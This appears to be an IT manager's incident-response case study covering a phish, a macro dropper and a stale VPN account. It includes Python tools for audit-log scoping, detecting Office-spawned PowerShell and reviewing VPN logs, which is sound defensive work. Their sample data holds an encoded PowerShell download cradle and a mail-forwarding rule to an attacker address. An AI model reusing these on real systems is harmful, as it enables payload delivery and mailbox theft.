5 real security incidents investigated and contained as IT Manager at a multi-site manufacturing company. MTTR reduced from 48 hours to 6 hours through formal IR playbook development, SentinelOne deployment, and repeatable containment procedures.
| Field | Detail |
|---|---|
| Organization | Multi-site manufacturing company, 4 locations, ~100 endpoints (anonymized) |
| Role | IT Manager — sole security responder |
| Incidents investigated | 5 security events over 18-month period |
| Baseline MTTR (inherited) | 48 hours (incidents discovered days late, no formal process) |
| Post-improvement MTTR | 6 hours (SentinelOne deployed, playbooks active) |
| Outcome | All 5 incidents contained; no data exfiltration found in any of them; no production downtime caused by any security event |
When I joined the organization, there was no formal incident response process. Security events were discovered by end users reporting performance issues or strange behavior — not by any detection tooling. The previous AV (legacy signature-based) generated no meaningful alerts and had no centralized dashboard. When something happened, the response was ad hoc: an IT ticket was opened, someone looked at the machine, and decisions were made without a structured process or documentation.
In the 12 months before I joined, five security events had already occurred (these are the inherited baseline, separate from the five incidents covered below). None had a formal post-mortem. Two involved compromised credentials; one involved malware on a production-floor machine that was not identified until several days after the initial infection. With no detection tooling, no centralized logging, and no IR playbook, the organization was operationally blind to its own threat landscape.
The first step was eliminating the detection gap. Legacy AV was replaced with SentinelOne Singularity across all 100+ endpoints, providing behavioral AI detection, centralized telemetry, and the ability to isolate endpoints remotely. (Full deployment write-up: SentinelOne EDR Deployment.) With SentinelOne active, previously invisible threats became immediately visible and actionable.
I documented a tiered IR playbook based on the NIST SP 800-61 framework, adapted for a small IT team operating without a dedicated security team:
| Priority | Trigger | SLA | Actions |
|---|---|---|---|
| P1 — Critical | Active ransomware, confirmed lateral movement, data exfiltration indicators | 15 min to isolate | Immediate network isolation via SentinelOne network quarantine (Disconnect from Network) and process kill; escalate to management; begin forensic preservation |
| P2 — High | Credential harvesting, suspicious PowerShell, unauthorized admin activity | 1 hour to triage | Review SentinelOne telemetry; isolate if confirmed malicious; password reset for affected accounts |
| P3 — Medium | Phishing email opened (no payload), suspicious outbound connection, unauthorized software | 4 hours to review | Review logs; user awareness notification; block indicator at firewall if applicable |
| P4 — Low | Policy violations, failed auth spikes, AV detection of known-benign PUP | Next business day | Log, document, communicate to affected user |
The first of the five incidents, a credential phish against M365:
| Field | Detail |
|---|---|
| Detection method | User reported suspicious email; Entra ID Identity Protection flagged sign-in from anomalous location |
| Finding | User credentials captured via a fake M365 login page; the attacker authenticated successfully once from Eastern Europe before MFA blocked further attempts. The successful sign-in used legacy authentication, which was still enabled and does not enforce MFA, so it served as an MFA bypass. |
| Containment | Immediately revoked all active sessions; forced password reset; blocked sign-in pending investigation |
| Scope determination | Reviewed M365 audit logs — no email forwarding rules, no data export, no mailbox delegation changes. Single unauthorized sign-in confirmed, no persistence established. |
| Remediation | Legacy authentication blocked for all users (accelerated from the planned M365 hardening project); MFA re-enrolled, restricted to a compliant device |
| MTTR | 4.5 hours (detection to confirmed containment) |
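The scope determination above (a single unauthorized sign-in, no forwarding rules, no delegation changes) can be checked mechanically against an export of the unified audit log. The following is an added example, not the tooling used in the incident: it assumes records shaped like Search-UnifiedAuditLog output (Operation, UserId, CreationDate, ClientIP, and for Exchange cmdlets a Parameters list of Name/Value pairs), and every address, name and timestamp in the sample data is constructed.

```python
"""Scope an M365 account compromise from exported audit records.

Added example (not the original write-up's tooling). Records are assumed
to follow the shape of Search-UnifiedAuditLog output: Operation, UserId,
CreationDate, ClientIP and, for Exchange cmdlets, Parameters as a list of
{"Name", "Value"} pairs. The sample data below is constructed.
"""
import json
from dataclasses import dataclass

# Exchange operations that create persistence or widen access after a takeover.
PERSISTENCE_OPS = {
    "New-InboxRule", "Set-InboxRule", "UpdateInboxRules",   # inbox rules (admin or Outlook)
    "Set-Mailbox",                                           # mailbox-level forwarding
    "Add-MailboxPermission", "Add-RecipientPermission",      # delegation
    "New-TransportRule", "Set-TransportRule",                # tenant-wide rules
}
# Parameters that route mail to an attacker-controlled address.
FORWARDING_PARAMS = {
    "ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
    "ForwardingSmtpAddress", "ForwardingAddress",
}

@dataclass
class Finding:
    severity: str     # "critical" | "high"
    when: str
    operation: str
    detail: str

def _params(record):
    """Flatten the Name/Value parameter list of an Exchange cmdlet record."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}

def scope_account(records, user, trusted_ips):
    """Return time-ordered findings for `user`: sign-ins from untrusted IPs
    plus any persistence or delegation change made by (or as) that account."""
    findings = []
    for rec in sorted(records, key=lambda r: r["CreationDate"]):
        if rec.get("UserId", "").lower() != user.lower():
            continue
        op = rec["Operation"]
        if op == "UserLoggedIn":
            ip = rec.get("ClientIP")
            if ip not in trusted_ips:
                findings.append(Finding("high", rec["CreationDate"], op,
                                        f"sign-in from untrusted IP {ip}"))
        elif op in PERSISTENCE_OPS:
            params = _params(rec)
            fwd = sorted(FORWARDING_PARAMS.intersection(params))
            if fwd:
                detail = "mail forwarding set: " + ", ".join(f"{k}={params[k]}" for k in fwd)
                findings.append(Finding("critical", rec["CreationDate"], op, detail))
            else:
                findings.append(Finding("high", rec["CreationDate"], op,
                                        "rule/permission change: " + json.dumps(params, sort_keys=True)))
    return findings

def persistence_established(findings):
    """True if anything beyond the sign-in itself was found for the account."""
    return any(f.operation != "UserLoggedIn" for f in findings)

# --- constructed sample data (not from the incident) -----------------------
VICTIM = "a.user@example.com"
TRUSTED_IPS = {"198.51.100.4"}                               # assumed office egress IP
SAMPLE_RECORDS = [
    {"CreationDate": "2024-03-12T02:14:09Z", "Operation": "UserLoggedIn",
     "UserId": VICTIM, "ClientIP": "203.0.113.7"},           # the one foreign sign-in
    {"CreationDate": "2024-03-12T07:55:31Z", "Operation": "UserLoggedIn",
     "UserId": VICTIM, "ClientIP": "198.51.100.4"},
    {"CreationDate": "2024-03-12T08:10:00Z", "Operation": "New-InboxRule",
     "UserId": "other.user@example.com",                     # someone else's rule: ignored
     "Parameters": [{"Name": "Name", "Value": "Sort invoices"},
                    {"Name": "MoveToFolder", "Value": "Invoices"}]},
]
# The same export plus the persistence the write-up ruled out: a forwarding rule.
COMPROMISED_RECORDS = SAMPLE_RECORDS + [
    {"CreationDate": "2024-03-12T02:16:40Z", "Operation": "New-InboxRule",
     "UserId": VICTIM, "ClientIP": "203.0.113.7",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "drop@attacker.example"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
]

if __name__ == "__main__":
    for label, recs in (("incident", SAMPLE_RECORDS), ("with persistence", COMPROMISED_RECORDS)):
        found = scope_account(recs, VICTIM, TRUSTED_IPS)
        print(f"{label}: persistence={persistence_established(found)}")
        for f in found:
            print(f"  [{f.severity}] {f.when} {f.operation}: {f.detail}")
```

The second record set shows why the forwarding check matters: the same single foreign sign-in, followed two minutes later by a one-character-named rule that forwards and deletes, is a classic business-email-compromise setup and would change the scope from "one sign-in" to "active persistence".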
The second incident, a macro-enabled Excel document launching PowerShell on a workstation:
| Field | Detail |
|---|---|
| Detection method | SentinelOne behavioral detection — flagged execution of obfuscated PowerShell spawned from a macro-enabled Excel document |
| Finding | User opened emailed Excel file containing macro payload; PowerShell attempted to download a second stage from an external domain (blocked by firewall egress rules) |
| Containment | SentinelOne auto-quarantined the malicious file; machine isolated from network via SentinelOne remote action within 8 minutes of alert |
| Scope determination | No lateral movement observed before isolation, and isolation prevented any further AD authentication from the host; no second stage downloaded (outbound blocked). Contained to a single endpoint. |
| Remediation | Machine wiped and reimaged; user awareness training; macro execution blocked via GPO for all non-IT workstations; file hash added to the SentinelOne blocklist |
| MTTR | 3.5 hours (alert to fully remediated machine) |
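The behavioral detection that caught this chain reduces to a process-tree rule: an Office application spawning a script host, with an encoded or download-cradle command line. The following is an added example of that rule, not the page's own or SentinelOne's logic. It runs over constructed process-creation events using Sysmon-style field names (ParentImage, Image, CommandLine), which are an assumption, decodes the -EncodedCommand payload so an analyst sees the plaintext, and maps the result to the P2 tier the playbook above assigns to suspicious PowerShell.

```python
"""Detection rule for the Office-spawns-PowerShell chain in the incident above.

Added example, not the page's own or SentinelOne's detection logic. It runs
over constructed process-creation events with Sysmon-style field names
(ParentImage, Image, CommandLine), which are an assumption, and decodes
-EncodedCommand payloads (UTF-16LE, base64) so the analyst sees plaintext.
"""
import base64
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Lower-case strings indicating a download cradle or defence evasion.
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest",
                   "net.webclient", "invoke-expression", "iex", "frombase64string")
EVASION_TOKENS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                  "-exec bypass", "-executionpolicy bypass", "-noni")

def basename(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event):
    """Return a finding dict when an Office app spawns a script host, else None."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    haystack = (cmd + " " + (decoded or "")).lower()     # search both raw and decoded text
    indicators = [t for t in DOWNLOAD_TOKENS + EVASION_TOKENS if t in haystack]
    if decoded is not None:
        indicators.append("encoded-command")
    return {
        "rule": "office-spawned-script-host",
        "parent": parent, "child": child,
        "decoded": decoded,
        "indicators": indicators,
        # Playbook tier: suspicious PowerShell is P2. A download cradle means a
        # second stage is being fetched, so recommend isolating the host now.
        "priority": "P2",
        "isolate": any(t in indicators for t in DOWNLOAD_TOKENS),
    }

# --- constructed sample events (not telemetry from the incident) ----------
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()   # how -enc payloads are built
SAMPLE_EVENT = {
    "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
}
BENIGN_EVENT = {   # an admin script launched from the desktop: parent is explorer, not Office
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
}

if __name__ == "__main__":
    for ev in (SAMPLE_EVENT, BENIGN_EVENT):
        print(evaluate(ev))
```

The point of decoding rather than just flagging the `-enc` switch is that the decoded text is what tells the responder whether isolation is urgent: a cradle pointing at an external host means the next step is a download, which in this incident the firewall egress rules happened to block.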
The third incident, VPN access through a shared contractor account that survived offboarding:
| Field | Detail |
|---|---|
| Detection method | FortiAnalyzer flagged an after-hours VPN authentication using credentials belonging to a contractor whose engagement had ended |
| Finding | The contractor's VPN credentials were still valid 3 weeks after termination. The account was shared among several people, so it was never tied to any one person's offboarding and was not deprovisioned when the contractor left. |
| Containment | VPN account immediately disabled; all active VPN sessions terminated; reviewed FortiAnalyzer logs for all activity during unauthorized session |
| Scope determination | Session lasted 22 minutes; two file shares were accessed (read only); the FortiAnalyzer egress log review showed no data transferred to an external destination. (Flow logs show volumes and destinations, not file contents, so the conclusion rests on the read-only access and the absence of outbound transfers.) |
| Remediation | Audited all VPN accounts; eliminated shared credentials; tied all VPN access to individual M365 identities with MFA required; implemented offboarding checklist with IT sign-off requirement |
| MTTR | 6 hours (detection to confirmed no data loss, process remediation complete) |
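The review that FortiAnalyzer's alert triggered (which accounts connected, when, from where, and for how long) is a small amount of log parsing once the VPN events are exported. The following is an added example, not the procedure used in the incident or a Fortinet tool: the log lines are constructed in FortiGate's key=value event style (date, time, subtype, action, user, remip, duration), and the business-hours window and the list of offboarded accounts are assumptions the reviewer would supply. It goes a step beyond the incident by also flagging an account seen from several remote IPs, the pattern a shared credential produces.

```python
"""Review FortiGate SSL-VPN event logs for the conditions in the incident above.

Added example, not the original page's procedure or a Fortinet tool. The log
lines are constructed in FortiGate's key=value style (date, time, subtype,
action, user, remip, duration); the business-hours window and the list of
offboarded accounts are assumptions the reviewer supplies.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, time

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="quoted value" or key=bare
BUSINESS_HOURS = (time(7, 0), time(19, 0))        # assumed local working window

@dataclass
class Finding:
    severity: str   # "high" | "medium" | "info"
    user: str
    detail: str

def parse(line):
    """Split a FortiGate key=value line into a dict and add a datetime 'ts'."""
    rec = {k: (q or b) for k, q, b in KV.findall(line)}
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    return rec

def review(lines, offboarded, hours=BUSINESS_HOURS):
    """Flag tunnel-ups by offboarded accounts, after-hours tunnel-ups, and
    accounts seen from several remote IPs (a shared-credential indicator)."""
    findings, ips_by_user = [], defaultdict(set)
    for rec in map(parse, lines):
        if rec.get("subtype") != "vpn":
            continue                                   # not a VPN event
        user, ip, action, ts = rec.get("user"), rec.get("remip"), rec.get("action"), rec["ts"]
        if action == "tunnel-up":
            ips_by_user[user].add(ip)
            if user in offboarded:
                findings.append(Finding("high", user,
                    f"{ts:%Y-%m-%d %H:%M} tunnel-up by offboarded account from {ip}"))
            if not hours[0] <= ts.time() < hours[1]:
                findings.append(Finding("medium", user,
                    f"{ts:%Y-%m-%d %H:%M} after-hours tunnel-up from {ip}"))
        elif action == "tunnel-down" and user in offboarded:
            minutes = int(rec.get("duration", 0)) // 60
            findings.append(Finding("info", user,
                f"session ended {ts:%Y-%m-%d %H:%M} after {minutes} min; "
                "pull file-share and egress logs for that window"))
    for user, ips in ips_by_user.items():
        if len(ips) > 1:
            findings.append(Finding("medium", user,
                f"tunnel-ups from {len(ips)} distinct remote IPs {sorted(ips)}: shared-credential indicator"))
    return findings

# --- constructed sample log (FortiGate key=value style, not real data) ----
SAMPLE_LOG = [
    'date=2024-03-12 time=23:41:05 type="event" subtype="vpn" level="information" action="tunnel-up" tunneltype="ssl-tunnel" user="vendor-shared" group="ssl_vpn" remip=203.0.113.7 msg="SSL tunnel established"',
    'date=2024-03-13 time=00:03:05 type="event" subtype="vpn" level="information" action="tunnel-down" tunneltype="ssl-tunnel" user="vendor-shared" group="ssl_vpn" remip=203.0.113.7 duration=1320 msg="SSL tunnel shutdown"',
    'date=2024-03-13 time=08:15:40 type="event" subtype="vpn" level="information" action="tunnel-up" tunneltype="ssl-tunnel" user="jsmith" group="ssl_vpn" remip=192.0.2.44 msg="SSL tunnel established"',
    'date=2024-03-13 time=09:02:11 type="event" subtype="vpn" level="information" action="tunnel-up" tunneltype="ssl-tunnel" user="vendor-shared" group="ssl_vpn" remip=198.51.100.9 msg="SSL tunnel established"',
    'date=2024-03-13 time=09:05:00 type="event" subtype="system" level="notice" action="login" user="admin" msg="Administrator admin logged in successfully from https(192.0.2.10)"',
]
OFFBOARDED = {"vendor-shared"}   # assumed: accounts that should have been removed at offboarding

if __name__ == "__main__":
    for f in review(SAMPLE_LOG, OFFBOARDED):
        print(f"[{f.severity}] {f.user}: {f.detail}")
```

Note that the offboarded list is the input the incident lacked: without it the review still surfaces the after-hours login and the two-IP pattern, but only as medium findings. Keeping that list current is exactly what the offboarding checklist with IT sign-off is meant to guarantee.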
Two additional incidents, one involving a ransomware precursor (Cobalt Strike beacon activity detected and contained before a second stage was delivered) and one involving a compromised vendor account used to send internal phishing emails, were both contained within the 6-hour MTTR target. Both were detected proactively by SentinelOne and FortiAnalyzer rather than by user reports, which is the direct result of the detection tooling deployment.
The before/after comparison across the inherited baseline and the five incidents above:
| Metric | Before (inherited) | After (SentinelOne, FortiAnalyzer, playbook) |
|---|---|---|
| Mean Time to Detect | Hours to days (user-reported) | Minutes (SentinelOne / FortiAnalyzer automated detection) |
| Mean Time to Respond | No formal process — ad hoc response | 15-min P1 SLA; active playbook for each severity tier |
| Mean Time to Recover | 48 hours average | 6 hours average |
| Post-incident documentation | None | Formal incident report for every event; lessons-learned review |
| Repeat incidents (same root cause) | Recurring (no root cause elimination) | Zero repeat incidents — each event drove a control improvement |